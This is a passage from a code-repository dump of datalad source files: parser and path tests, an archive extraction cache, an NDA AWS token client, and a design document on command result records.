runner\n\"\"\"\n\nfrom .coreprotocols import (\n KillOutput,\n NoCapture,\n StdErrCapture,\n StdOutCapture,\n StdOutErrCapture,\n)\nfrom .exception import CommandError\nfrom .gitrunner import GitWitlessRunner as GitRunner\nfrom .protocol import WitlessProtocol as Protocol\nfrom .runner import WitlessRunner as Runner\n" }, { "alpha_fraction": 0.5773832201957703, "alphanum_fraction": 0.5808568000793457, "avg_line_length": 30.59756088256836, "blob_id": "d726f94b24ce2ff1561899945a3ad649655640f3", "content_id": "5f6d2291ab4c67a79f482711f65034c99119fa6d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2591, "license_type": "permissive", "max_line_length": 79, "num_lines": 82, "path": "/datalad/cli/tests/test_parser.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Tests for parser components\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom io import StringIO\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_raises,\n)\n\nfrom ..parser import (\n fail_with_short_help,\n setup_parser,\n)\n\n\ndef test_fail_with_short_help():\n out = StringIO()\n with assert_raises(SystemExit) as cme:\n fail_with_short_help(exit_code=3, out=out)\n assert_equal(cme.value.code, 3)\n assert_equal(out.getvalue(), \"\")\n\n out = StringIO()\n with assert_raises(SystemExit) as cme:\n fail_with_short_help(msg=\"Failed badly\", out=out)\n assert_equal(cme.value.code, 1)\n assert_equal(out.getvalue(), \"error: Failed badly\\n\")\n\n # Suggestions, hint, etc\n out = StringIO()\n with assert_raises(SystemExit) as cme:\n fail_with_short_help(\n msg=\"Failed badly\",\n known=[\"mother\", \"mutter\", \"father\", \"son\"],\n provided=\"muther\",\n hint=\"You can become one\",\n exit_code=0, # no one forbids\n what=\"parent\",\n out=out)\n assert_equal(cme.value.code, 0)\n assert_equal(out.getvalue(),\n \"error: Failed badly\\n\"\n \"datalad: Unknown parent 'muther'. See 'datalad --help'.\\n\\n\"\n \"Did you mean any of these?\\n\"\n \" mutter\\n\"\n \" mother\\n\"\n \" father\\n\"\n \"Hint: You can become one\\n\")\n\n\ndef check_setup_parser(args, exit_code=None):\n parser = None\n with patch('sys.stderr', new_callable=StringIO) as cmerr:\n with patch('sys.stdout', new_callable=StringIO) as cmout:\n if exit_code is not None:\n with assert_raises(SystemExit) as cm:\n setup_parser(args)\n else:\n parser = setup_parser(args)\n if exit_code is not None:\n assert_equal(cm.value.code, exit_code)\n stdout = cmout.getvalue()\n stderr = cmerr.getvalue()\n return {'parser': parser, 'out': stdout, 'err': stderr}\n\n\ndef test_setup():\n # insufficient arguments\n check_setup_parser([], 2)\n assert_in('too few arguments', check_setup_parser(['datalad'], 2)['err'])\n assert_in('.', check_setup_parser(['datalad', '--version'], 0)['out'])\n parser = check_setup_parser(['datalad', 'wtf'])['parser']\n # check into the guts of argparse to check that really only a single\n # subparser was constructed\n assert_equal(\n list(parser._positionals._group_actions[0].choices.keys()),\n ['wtf']\n )\n" }, { "alpha_fraction": 0.5814915299415588, "alphanum_fraction": 0.5833436250686646, "avg_line_length": 36.23678207397461, "blob_id": "0fb1a2e35b08e1b999f9d6dd122d79e309d371d6", "content_id": "a5ef87990abd1c83289c650b2b43a145dbf67686", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16198, "license_type": "permissive", "max_line_length": 95, "num_lines": 435, "path": "/datalad/support/archives.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Various handlers/functionality for different types of files (e.g. for archives)\n\n\"\"\"\n\nimport hashlib\nimport logging\nimport os\nimport random\nimport string\nimport tempfile\n\nfrom datalad import cfg\nfrom datalad.config import anything2bool\nfrom datalad.consts import ARCHIVES_TEMP_DIR\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.locking import lock_if_check_fails\nfrom datalad.support.path import (\n abspath,\n exists,\n isabs,\n isdir,\n)\nfrom datalad.support.path import join as opj\nfrom datalad.support.path import (\n normpath,\n pardir,\n relpath,\n)\nfrom datalad.support.path import sep as opsep\nfrom datalad.utils import (\n Path,\n any_re_search,\n ensure_bytes,\n ensure_unicode,\n get_tempfile_kwargs,\n on_windows,\n rmtemp,\n rmtree,\n unlink,\n)\n\n# fall back on patool, if requested, or 7z is not found\nif (cfg.obtain('datalad.runtime.use-patool', default=False,\n valtype=anything2bool)\n or not external_versions['cmd:7z']):\n from datalad.support.archive_utils_patool import compress_files\n from datalad.support.archive_utils_patool import \\\n decompress_file as \\\n _decompress_file # other code expects this to be here\nelse:\n from datalad.support.archive_utils_7z import compress_files\n from datalad.support.archive_utils_7z import \\\n decompress_file as \\\n _decompress_file # other code expects this to be here\n\nlgr = logging.getLogger('datalad.support.archives')\n\n\ndef decompress_file(archive, dir_, leading_directories='strip'):\n \"\"\"Decompress `archive` into a directory `dir_`\n\n Parameters\n ----------\n archive: str\n dir_: str\n leading_directories: {'strip', None}\n If `strip`, and archive contains a single leading directory under which\n all content is stored, all the content will be moved one directory up\n and that leading directory will be removed.\n \"\"\"\n if not exists(dir_):\n lgr.debug(\"Creating directory %s to extract archive into\", dir_)\n os.makedirs(dir_)\n\n _decompress_file(archive, dir_)\n\n if leading_directories == 'strip':\n _, dirs, files = next(os.walk(dir_))\n if not len(files) and len(dirs) == 1:\n # move all the content under dirs[0] up 1 level\n widow_dir = opj(dir_, dirs[0])\n lgr.debug(\"Moving content within %s upstairs\", widow_dir)\n subdir, subdirs_, files_ = next(os.walk(opj(dir_, dirs[0])))\n for f in subdirs_ + files_:\n os.rename(opj(subdir, f), opj(dir_, f))\n # NFS might hold it victim so use rmtree so it tries a few times\n rmtree(widow_dir)\n elif leading_directories is None:\n pass # really do nothing\n else:\n raise NotImplementedError(\"Not supported %s\" % leading_directories)\n\n\ndef _get_cached_filename(archive):\n \"\"\"A helper to generate a filename which has original filename and additional suffix\n which wouldn't collide across files with the same name from different locations\n \"\"\"\n #return \"%s_%s\" % (basename(archive), hashlib.md5(archive).hexdigest()[:5])\n # per se there is no reason to maintain any long original name here.\n archive_cached = hashlib.md5(ensure_bytes(str(Path(archive).resolve()))).hexdigest()[:10]\n lgr.debug(\"Cached directory for archive %s is %s\", archive, archive_cached)\n return archive_cached\n\n\ndef _get_random_id(size=6, chars=string.ascii_uppercase + string.digits):\n \"\"\"Return a random ID composed from digits and uppercase letters\n\n upper-case so we are tolerant to unlikely collisions on dummy FSs\n \"\"\"\n return ''.join(random.choice(chars) for _ in range(size))\n\n\nclass ArchivesCache(object):\n \"\"\"Cache to maintain extracted archives\n\n Parameters\n ----------\n toppath : str\n Top directory under .git/ of which temp directory would be created.\n If not provided -- random tempdir is used\n persistent : bool, optional\n Passed over into generated ExtractedArchives\n \"\"\"\n # TODO: make caching persistent across sessions/runs, with cleanup\n # IDEA: extract under .git/annex/tmp so later on annex unused could clean it\n # all up\n def __init__(self, toppath=None, persistent=False):\n self._toppath = toppath\n if toppath:\n path = opj(toppath, ARCHIVES_TEMP_DIR)\n if not persistent:\n tempsuffix = \"-\" + _get_random_id()\n lgr.debug(\"For non-persistent archives using %s suffix for path %s\",\n tempsuffix, path)\n path += tempsuffix\n # TODO: begging for a race condition\n if not exists(path):\n lgr.debug(\"Initiating clean cache for the archives under %s\",\n path)\n try:\n self._made_path = True\n os.makedirs(path)\n lgr.debug(\"Cache initialized\")\n except Exception:\n lgr.error(\"Failed to initialize cached under %s\", path)\n raise\n else:\n lgr.debug(\n \"Not initiating existing cache for the archives under %s\",\n path)\n self._made_path = False\n else:\n if persistent:\n raise ValueError(\n \"%s cannot be persistent, because no toppath was provided\"\n % self)\n path = tempfile.mkdtemp(**get_tempfile_kwargs())\n self._made_path = True\n\n self._path = path\n self.persistent = persistent\n # TODO? ensure that it is absent or we should allow for it to persist a bit?\n #if exists(path):\n # self._clean_cache()\n self._archives = {}\n\n # TODO: begging for a race condition\n if not exists(path):\n lgr.debug(\"Initiating clean cache for the archives under %s\", self.path)\n try:\n self._made_path = True\n os.makedirs(path)\n lgr.debug(\"Cache initialized\")\n except Exception as e:\n lgr.error(\"Failed to initialize cached under %s\", path)\n raise\n else:\n lgr.debug(\"Not initiating existing cache for the archives under %s\", self.path)\n self._made_path = False\n\n @property\n def path(self):\n return self._path\n\n def clean(self, force=False):\n for aname, a in list(self._archives.items()):\n a.clean(force=force)\n del self._archives[aname]\n # Probably we should not rely on _made_path and not bother if persistent removing it\n # if ((not self.persistent) or force) and self._made_path:\n # lgr.debug(\"Removing the entire archives cache under %s\", self.path)\n # rmtemp(self.path)\n if (not self.persistent) or force:\n lgr.debug(\"Removing the entire archives cache under %s\", self.path)\n rmtemp(self.path)\n\n def _get_normalized_archive_path(self, archive):\n \"\"\"Return full path to archive\n\n So we have consistent operation from different subdirs,\n while referencing archives from the topdir\n\n TODO: why do we need it???\n \"\"\"\n if not isabs(archive) and self._toppath:\n out = normpath(opj(self._toppath, archive))\n if relpath(out, self._toppath).startswith(pardir):\n raise RuntimeError(\"%s points outside of the topdir %s\"\n % (archive, self._toppath))\n if isdir(out):\n raise RuntimeError(\"got a directory here... bleh\")\n return out\n return archive\n\n def get_archive(self, archive):\n archive = self._get_normalized_archive_path(archive)\n\n if archive not in self._archives:\n self._archives[archive] = \\\n ExtractedArchive(archive,\n opj(self.path, _get_cached_filename(archive)),\n persistent=self.persistent)\n\n return self._archives[archive]\n\n def __getitem__(self, archive):\n return self.get_archive(archive)\n\n def __delitem__(self, archive):\n archive = self._get_normalized_archive_path(archive)\n self._archives[archive].clean()\n del self._archives[archive]\n\n def __del__(self):\n try:\n # we can at least try\n if not self.persistent:\n self.clean()\n except: # MIH: IOError?\n pass\n\n\nclass ExtractedArchive(object):\n \"\"\"Container for the extracted archive\n \"\"\"\n\n # suffix to use for a stamp so we could guarantee that extracted archive is\n STAMP_SUFFIX = '.stamp'\n\n def __init__(self, archive, path=None, persistent=False):\n self._archive = archive\n # TODO: bad location for extracted archive -- use tempfile\n if not path:\n path = tempfile.mktemp(**get_tempfile_kwargs(prefix=_get_cached_filename(archive)))\n\n if exists(path) and not persistent:\n raise RuntimeError(\"Directory %s already exists whenever it should not \"\n \"persist\" % path)\n self._persistent = persistent\n self._path = path\n\n def __repr__(self):\n return \"%s(%r, path=%r)\" % (self.__class__.__name__, self._archive, self.path)\n\n def clean(self, force=False):\n # would interfere with tests\n # if os.environ.get('DATALAD_TESTS_TEMP_KEEP'):\n # lgr.info(\"As instructed, not cleaning up the cache under %s\"\n # % self._path)\n # return\n\n for path, name in [\n (self._path, 'cache'),\n (self.stamp_path, 'stamp file')\n ]:\n if exists(path):\n if (not self._persistent) or force:\n lgr.debug(\"Cleaning up the %s for %s under %s\", name, self._archive, path)\n # TODO: we must be careful here -- to not modify permissions of files\n # only of directories\n (rmtree if isdir(path) else unlink)(path)\n\n @property\n def path(self):\n \"\"\"Given an archive -- return full path to it within cache (extracted)\n \"\"\"\n return self._path\n\n @property\n def stamp_path(self):\n return self._path + self.STAMP_SUFFIX\n\n @property\n def is_extracted(self):\n return exists(self.path) and exists(self.stamp_path) \\\n and os.stat(self.stamp_path).st_mtime >= os.stat(self.path).st_mtime\n\n def assure_extracted(self):\n \"\"\"Return path to the extracted `archive`. Extract archive if necessary\n \"\"\"\n path = self.path\n\n with lock_if_check_fails(\n check=(lambda s: s.is_extracted, (self,)),\n lock_path=path,\n operation=\"extract\"\n ) as (check, lock):\n if lock:\n assert not check\n self._extract_archive(path)\n return path\n\n def _extract_archive(self, path):\n # we need to extract the archive\n # TODO: extract to _tmp and then move in a single command so we\n # don't end up picking up broken pieces\n lgr.debug(\"Extracting %s under %s\", self._archive, path)\n if exists(path):\n lgr.debug(\n \"Previous extracted (but probably not fully) cached archive \"\n \"found. Removing %s\",\n path)\n rmtree(path)\n os.makedirs(path)\n assert (exists(path))\n # remove old stamp\n if exists(self.stamp_path):\n rmtree(self.stamp_path)\n decompress_file(self._archive, path, leading_directories=None)\n # TODO: must optional since we might to use this content, move it\n # into the tree etc\n # lgr.debug(\"Adjusting permissions to R/O for the extracted content\")\n # rotree(path)\n assert (exists(path))\n # create a stamp\n with open(self.stamp_path, 'wb') as f:\n f.write(ensure_bytes(self._archive))\n # assert that stamp mtime is not older than archive's directory\n assert (self.is_extracted)\n\n # TODO: remove?\n #def has_file_ready(self, afile):\n # lgr.debug(u\"Checking file {afile} from archive {archive}\".format(**locals()))\n # return exists(self.get_extracted_filename(afile))\n\n def get_extracted_filename(self, afile):\n \"\"\"Return full path to the `afile` within extracted `archive`\n\n It does not actually extract any archive\n \"\"\"\n return opj(self.path, afile)\n\n def get_extracted_files(self):\n \"\"\"Generator to provide filenames which are available under extracted archive\n \"\"\"\n path = self.assure_extracted()\n path_len = len(path) + (len(os.sep) if not path.endswith(os.sep) else 0)\n for root, dirs, files in os.walk(path): # TEMP\n for name in files:\n yield ensure_unicode(opj(root, name)[path_len:])\n\n def get_leading_directory(self, depth=None, consider=None, exclude=None):\n \"\"\"Return leading directory of the content within archive\n\n Parameters\n ----------\n depth: int or None, optional\n Maximal depth of leading directories to consider. If None - no upper\n limit\n consider : list of str, optional\n Regular expressions for file/directory names to be considered (before\n exclude). Applied to the entire relative path to the file as in the archive\n exclude: list of str, optional\n Regular expressions for file/directory names to be excluded from consideration.\n Applied to the entire relative path to the file as in the archive\n\n Returns\n -------\n str or None:\n If there is no single leading directory -- None returned\n \"\"\"\n leading = None\n # returns only files, so no need to check if a dir or not\n for fpath in self.get_extracted_files():\n if consider and not any_re_search(consider, fpath):\n continue\n if exclude and any_re_search(exclude, fpath):\n continue\n\n lpath = fpath.split(opsep)\n dpath = lpath[:-1] # directory path components\n if leading is None:\n leading = dpath if depth is None else dpath[:depth]\n else:\n if dpath[:len(leading)] != leading:\n # find smallest common path\n leading_ = []\n # TODO: there might be more efficient pythonic way\n for d1, d2 in zip(leading, dpath):\n if d1 != d2:\n break\n leading_.append(d1)\n leading = leading_\n if not len(leading):\n # no common leading - ready to exit\n return None\n return leading if leading is None else opj(*leading)\n\n def get_extracted_file(self, afile):\n lgr.debug(\"Requested file %s from archive %s\", afile, self._archive)\n # TODO: That could be a good place to provide \"compatibility\" layer if\n # filenames within archive are too obscure for local file system.\n # We could somehow adjust them while extracting and here channel back\n # \"fixed\" up names since they are only to point to the load\n self.assure_extracted()\n path = self.get_extracted_filename(afile)\n # TODO: make robust\n lgr.log(2, \"Verifying that %s exists\", abspath(path))\n assert exists(path), \"%s must exist\" % path\n return path\n\n def __del__(self):\n try:\n if self._persistent:\n self.clean()\n except Exception as e: # MIH: IOError?\n pass\n" }, { "alpha_fraction": 0.6202564835548401, "alphanum_fraction": 0.6236587166786194, "avg_line_length": 30.57851219177246, "blob_id": "3cf4d35d8fcd8899cdfcdee1d2eae8d9e0055ae6", "content_id": "d54b91643c8e2d5004ffda7fd2a6dc1aabb62c59", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3821, "license_type": "permissive", "max_line_length": 89, "num_lines": 121, "path": "/datalad/support/third/nda_aws_token_generator.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "## NDA AWS Token Generator\n## Author: NIMH Data Archives\n## http://ndar.nih.gov\n## License: MIT\n## https://opensource.org/licenses/MIT\n\nimport binascii\nimport hashlib\nimport logging\nimport xml.etree.ElementTree as etree\n\nimport sys\n\nif sys.version_info[0] == 2:\n import urllib2 as urllib_request\nelse:\n from urllib import request as urllib_request\n\nclass NDATokenGenerator(object):\n __schemas = {\n 'soap': 'http://schemas.xmlsoap.org/soap/envelope/',\n 'data': 'http://gov/nih/ndar/ws/datamanager/server/bean/jaxb'\n }\n\n def __init__(self, url):\n assert url is not None\n self.url = url\n logging.debug('constructed with url %s', url)\n\n def generate_token(self, username, password):\n logging.info('request to generate AWS token')\n encoded_password = self.__encode_password(password)\n request_xml = self.__construct_request_xml(username, encoded_password)\n return self.__make_request(request_xml)\n\n def __encode_password(self, password):\n logging.debug('encoding password')\n hasher = hashlib.sha1()\n hasher.update(password.encode('utf-8'))\n digest_bytes = hasher.digest()\n byte_string = binascii.hexlify(digest_bytes)\n output = byte_string.decode('utf-8')\n logging.debug('encoded password hash: %s', output)\n return output\n\n def __construct_request_xml(self, username, encoded_password):\n logging.debug('constructing request with %s - %s', username, encoded_password)\n soap_schema = self.__schemas['soap']\n datamanager_schema = self.__schemas['data']\n\n element = etree.Element('{%s}Envelope' % soap_schema)\n body = etree.SubElement(element, '{%s}Body' % soap_schema)\n userelement = etree.SubElement(body, '{%s}UserElement' % datamanager_schema)\n\n user = etree.SubElement(userelement, \"user\")\n uid = etree.SubElement(user, \"id\")\n uid.text = '0'\n\n uid = etree.SubElement(user, \"name\")\n uid.text = username\n\n uid = etree.SubElement(user, \"password\")\n uid.text = encoded_password\n\n uid = etree.SubElement(user, \"threshold\")\n uid.text = '0'\n\n logging.debug(etree.tostring(element))\n return etree.tostring(element)\n\n def __make_request(self, request_message):\n logging.debug('making post request to %s', self.url)\n\n headers = {\n 'SOAPAction': '\"generateToken\"',\n 'Content-Type': 'text/xml; charset=utf-8'\n }\n\n request = urllib_request.Request(self.url, data=request_message, headers=headers)\n logging.debug(request)\n response = urllib_request.urlopen(request)\n return self.__parse_response(response.read())\n\n def __parse_response(self, response):\n logging.debug('parsing response')\n tree = etree.fromstring(response)\n\n error = tree.find('.//errorMessage')\n if error is not None:\n error_msg = error.text\n logging.error('response had error message: %s', error_msg)\n raise Exception(error_msg)\n generated_token = tree[0][0]\n token_elements = [e.text for e in generated_token[0:4]]\n token = Token(*token_elements)\n return token\n\n\nclass Token:\n def __init__(self, access_key, secret_key, session, expiration):\n logging.debug('constructing token')\n self._access_key = access_key\n self._secret_key = secret_key\n self._session = session\n self._expiration = expiration\n\n @property\n def access_key(self):\n return self._access_key\n\n @property\n def secret_key(self):\n return self._secret_key\n\n @property\n def session(self):\n return self._session\n\n @property\n def expiration(self):\n return self._expiration\n" }, { "alpha_fraction": 0.735660195350647, "alphanum_fraction": 0.7365584373474121, "avg_line_length": 34.584476470947266, "blob_id": "7e9841e1f98383eba0b0f61a8b8106f68832ee5f", "content_id": "a9e7ddf2e16fec68a5782c3d54f0e209005cd383", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7793, "license_type": "permissive", "max_line_length": 83, "num_lines": 219, "path": "/docs/source/design/result_records.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_result_records:\n\n**************\nResult records\n**************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nResult records are the standard return value format for all DataLad commands.\nEach command invocation yields one or more result records. Result records are\nroutinely inspected throughout the code base, and are used to inform generic\nerror handling, as well as particular calling commands on how to proceed with\na specific operation.\n\nThe technical implementation of a result record is a Python dictionary. This\ndictionary must contain a number of mandatory fields/keys (see below). However,\nan arbitrary number of additional fields may be added to a result record.\n\nThe ``get_status_dict()`` function simplifies the creation of result records.\n\n.. note::\n Developers *must* compose result records with care! DataLad supports custom\n user-provided hook configurations that use result record fields to\n decide when to trigger a custom post-result operation. Such custom hooks\n rely on a persistent naming and composition of result record fields.\n Changes to result records, including field name changes, field value changes,\n but also timing/order of record emitting potentially break user set ups!\n\n\nMandatory fields\n================\n\nThe following keys *must* be present in any result record. If any of these\nkeys is missing, DataLad's behavior is undefined.\n\n\n``action``\n----------\n\nA string label identifying which type of operation a result is associated with.\nLabels *must not* contain white space. They should be compact, and lower-cases,\nand use ``_`` (underscore) to separate words in compound labels.\n\nA result without an ``action`` label will not be processed and is discarded.\n\n\n``path``\n--------\n\nA string with an *absolute* path describing the local entity a result is\nassociated with. Paths must be platform-specific (e.g., Windows paths on\nWindows, and POSIX paths on other operating systems). When a result is about an\nentity that has no meaningful relation to the local file system (e.g., a URL to\nbe downloaded), to ``path`` value should be determined with respect to the\npotential impact of the result on any local entity (e.g., a URL downloaded\nto a local file path, a local dataset modified based on remote information).\n\n.. _target-result-status:\n\n``status``\n----------\n\nThis field indicates the nature of a result in terms of four categories, identified\nby a string label.\n\n- ``ok``: a standard, to-be-expected result\n- ``notneeded``: an operation that was requested, but found to be unnecessary\n in order to achieve a desired goal\n- ``impossible``: a requested operation cannot be performed, possibly because\n its preconditions are not met\n- ``error``: an error occurred while performing an operation\n\nBased on the ``status`` field, a result is categorized into *success* (``ok``,\n``notneeded``) and *failure* (``impossible``, ``error``). Depending on the\n``on_failure`` parameterization of a command call, any failure-result emitted\nby a command can lead to an ``IncompleteResultsError`` being raised on command\nexit, or a non-zero exit code on the command line. With ``on_failure='stop'``,\nan operation is halted on the first failure and the command errors out\nimmediately, with ``on_failure='continue'`` an operation will continue despite\nintermediate failures and the command only errors out at the very end, with\n``on_failure='ignore'`` the command will not error even when failures occurred.\nThe latter mode can be used in cases where the initial status-characterization\nneeds to be corrected for the particular context of an operation (e.g., to\nrelabel expected and recoverable errors).\n\n\nCommon optional fields\n======================\n\nThe following fields are not required, but can be used to enrich a result\nrecord with additional information that improves its interpretability, or\ntriggers particular optional functionality in generic result processing.\n\n\n``type``\n--------\n\nThis field indicates the type of entity a result is associated with. This may\nor may not be the type of the local entity identified by the ``path`` value.\nThe following values are common, and should be used in matching cases, but\narbitrary other values are supported too:\n\n- ``dataset``: a DataLad dataset\n- ``file``: a regular file\n- ``directory``: a directory\n- ``symlink``: a symbolic link\n- ``key``: a git-annex key\n- ``sibling``: a Dataset sibling or Git remote\n\n\n``message``\n-----------\n\nA message providing additional human-readable information on the nature or\nprovenance of a result. Any non-``ok`` results *should* have a message providing\ninformation on the rational of their status characterization.\n\nA message can be a string or a tuple. In case of a tuple, the second item can\ncontain values for ``%``-expansion of the message string. Expansion is performed\nonly immediately prior to actually outputting the message, hence string formatting\nruntime costs can be avoided this way, if a message is not actually shown.\n\n\n``logger``\n----------\n\nIf a result record has a ``message`` field, then a given `Logger` instance\n(typically from ``logging.getLogger()``) will be used to automatically log\nthis message. The log channel/level is determined based on\n``datalad.log.result-level`` configuration setting. By default, this is\nthe ``debug`` level. When set to ``match-status`` the log level is determined\nbased on the ``status`` field of a result record:\n\n- ``debug`` for ``'ok'``, and ``'notneeded'`` results\n- ``warning`` for ``'impossible'`` results\n- ``error`` for ``'error'`` results\n\nThis feature should be used with care. Unconditional logging can lead to\nconfusing double-reporting when results rendered and also visibly logged.\n\n\n``refds``\n---------\n\nThis field can identify a path (using the same semantics and requirements as\nthe ``path`` field) to a reference dataset that represents the larger context\nof an operation. For example, when recursively processing multiple files across\na number of subdatasets, a ``refds`` value may point to the common superdataset.\nThis value may influence, for example, how paths are rendered in user-output.\n\n\n``parentds``\n------------\n\nThis field can identify a path (using the same semantics and requirements as\nthe ``path`` field) to a dataset containing an entity.\n\n\n``state``\n---------\n\nA string label categorizing the state of an entity. Common values are:\n\n- ``clean``\n- ``untracked``\n- ``modified``\n- ``deleted``\n- ``absent``\n- ``present``\n\n\n``error_message``\n-----------------\n\nAn error message that was captured or produced while achieving a result.\n\nAn error message can be a string or a tuple. In the case of a tuple, the\nsecond item can contain values for ``%``-expansion of the message string.\n\n\n``exception``\n-------------\n\nAn exception that occurred while achieving the reported result.\n\n\n``exception_traceback``\n-----------------------\n\nA string with a traceback for the exception reported in ``exception``.\n\n\nAdditional fields observed \"in the wild\"\n========================================\n\nGiven that arbitrary fields are supported in result records, it is impossible\nto compose a comprehensive list of field names (keys). However, in order to\ncounteract needless proliferation, the following list describes fields that\nhave been observed in implementations. Developers are encouraged to preferably\nuse compatible names from this list, or extend the list for additional items.\n\nIn alphabetical order:\n\n``bytesize``\n The size of an entity in bytes (integer).\n\n``gitshasum``\n SHA1 of an entity (string)\n\n``prev_gitshasum``\n SHA1 of a previous state of an entity (string)\n\n``key``\n The git-annex key associated with a ``type``-``file`` entity.\n" }, { "alpha_fraction": 0.5390608906745911, "alphanum_fraction": 0.5425466299057007, "avg_line_length": 31.73825454711914, "blob_id": "0cf25c70f6aa0821cfb41d6ae5c6800213c9c0b4", "content_id": "cb5de1670745fe1c9c666a743606bff99fbd2aaf", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4877, "license_type": "permissive", "max_line_length": 102, "num_lines": 149, "path": "/datalad/support/tests/test_path.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nfrom pathlib import PurePosixPath\n\nfrom ...tests.utils_pytest import (\n SkipTest,\n assert_raises,\n eq_,\n with_tempfile,\n)\nfrom ...utils import (\n chpwd,\n on_windows,\n rmtree,\n)\nfrom ..path import (\n abspath,\n curdir,\n get_parent_paths,\n get_filtered_paths_,\n robust_abspath,\n split_ext,\n)\n\nimport pytest\n\n\n@with_tempfile(mkdir=True)\ndef test_robust_abspath(tdir=None):\n with chpwd(tdir):\n eq_(robust_abspath(curdir), tdir)\n try:\n if os.environ.get('DATALAD_ASSERT_NO_OPEN_FILES'):\n raise Exception(\"cannot test under such pressure\")\n rmtree(tdir)\n except Exception as exc:\n # probably windows or above exception\n raise SkipTest(\n \"Cannot test in current environment\") from exc\n\n assert_raises(OSError, abspath, curdir)\n eq_(robust_abspath(curdir), tdir)\n\n\ndef test_split_ext():\n eq_(split_ext(\"file\"), (\"file\", \"\"))\n\n eq_(split_ext(\"file.py\"), (\"file\", \".py\"))\n eq_(split_ext(\"file.tar.gz\"), (\"file\", \".tar.gz\"))\n eq_(split_ext(\"file.toolong.gz\"), (\"file.toolong\", \".gz\"))\n\n eq_(split_ext(\"file.a.b.c.d\"), (\"file\", \".a.b.c.d\"))\n eq_(split_ext(\"file.a.b.cccc.d\"), (\"file\", \".a.b.cccc.d\"))\n eq_(split_ext(\"file.a.b.ccccc.d\"), (\"file.a.b.ccccc\", \".d\"))\n\n eq_(split_ext(\"file.a.b..c\"), (\"file\", \".a.b..c\"))\n\n\[email protected](\"sep\", [None, '/', '\\\\'])\ndef test_get_parent_paths(sep):\n if sep is None:\n gpp = get_parent_paths\n else:\n from functools import partial\n gpp = partial(get_parent_paths, sep=sep)\n\n # sanity/border checks\n eq_(gpp([], []), [])\n eq_(gpp([], ['a']), [])\n eq_(gpp(['a'], ['a']), ['a'])\n\n # Helper to provide testing across different seps and platforms while\n # specifying only POSIX paths here in the test\n def _p(path):\n if sep is None:\n return path\n else:\n return path.replace('/', sep)\n _pp = lambda paths: list(map(_p, paths))\n\n # no absolute paths anywhere\n if on_windows:\n assert_raises(ValueError, gpp, 'C:\\\\a', ['a'])\n assert_raises(ValueError, gpp, ['a'], 'C:\\\\a')\n elif sep != '\\\\': # \\ does not make it absolute\n assert_raises(ValueError, gpp, _p('/a'), ['a'])\n assert_raises(ValueError, gpp, ['a'], [_p('/a')])\n assert_raises(ValueError, gpp, [_p('a//a')], ['a'])\n # dups the actual code but there is no other way AFAIK\n asep = {'/': '\\\\', None: '\\\\', '\\\\': '/'}[sep]\n assert_raises(ValueError, gpp, [f'a{asep}a'], ['a'])\n\n paths = _pp(['a', 'a/b', 'a/b/file', 'c', 'd/sub/123'])\n\n eq_(gpp(paths, []), paths)\n eq_(gpp(paths, [], True), [])\n\n # actually a tricky one! we should check in descending lengths etc\n eq_(gpp(paths, paths), paths)\n # every path is also its own parent\n eq_(gpp(paths, paths, True), paths)\n\n # subdatasets not for every path -- multiple paths hitting the same parent,\n # and we will be getting only a single entry\n # to mimic how git ls-tree operates\n eq_(gpp(paths, ['a']), ['a', 'c', _p('d/sub/123')])\n eq_(gpp(paths, ['a'], True), ['a'])\n\n # and we get the deepest parent\n eq_(gpp(_pp(['a/b/file', 'a/b/file2']), _pp(['a', 'a/b'])), _pp(['a/b']))\n\n\ndef test_get_filtered_paths_():\n # just to avoid typing all the same\n def gfp(*args, **kwargs):\n return list(get_filtered_paths_(*args, **kwargs))\n\n assert gfp(['a', 'b'], ['a', 'c']) == ['a']\n assert gfp(['a', 'b'], ['b']) == ['b']\n assert gfp(['a', 'b'], ['c']) == []\n\n assert gfp(['a', 'b'], ['a/b', 'c']) == [] # a is not subpath of a/b\n assert gfp(['a', 'b'], ['a/b', 'c'], include_within_path=True) == ['a'] # a is not subpath of a/b\n\n # all paths returned due to '.', and order is sorted\n paths = ['a', 'b', '1/2/3', 'abc']\n paths_sorted = sorted(paths)\n assert gfp(paths, ['.']) == paths_sorted\n assert gfp(paths, paths_sorted) == paths_sorted\n assert gfp(paths, paths_sorted, include_within_path=True) == paths_sorted\n # we can take a mix of str and Path\n assert gfp([PurePosixPath(paths[0])] + paths[1:], ['.']) == paths_sorted\n\n\n # nothing within empty \"filter_paths\" matches -- so no paths yielded\n assert gfp(paths, []) == []\n\n assert_raises(ValueError, gfp, 